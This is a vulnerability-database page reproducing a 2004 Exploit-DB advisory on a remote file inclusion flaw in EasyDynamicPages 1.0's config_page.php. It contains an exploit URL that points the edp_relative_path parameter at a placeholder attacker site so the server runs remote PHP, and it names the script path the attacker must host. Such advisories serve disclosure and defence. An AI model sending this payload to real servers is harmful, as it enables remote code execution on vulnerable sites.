Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbTsbeginnervnEDB-ID:23507
HistoryJan 02, 2004 - 12:00 a.m.

EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion

2004-01-0200:00:00
tsbeginnervn
www.exploit-db.com
12

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9338/info

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. 

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php

Related

nessus 1
cvelist 1
nvd 1
cve 1
nessus
nessus
EasyDynamicPages Multiple Script edp_relative_path Parameter Remote File Inclusion
2004-01-02 00:00:00
cvelist
cvelist
CVE-2004-0073
2004-01-15 05:00:00
nvd
nvd
CVE-2004-0073
2004-02-17 05:00:00
cve
cve
CVE-2004-0073
2004-02-17 05:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23507
nessus1cvelist1nvd1cve1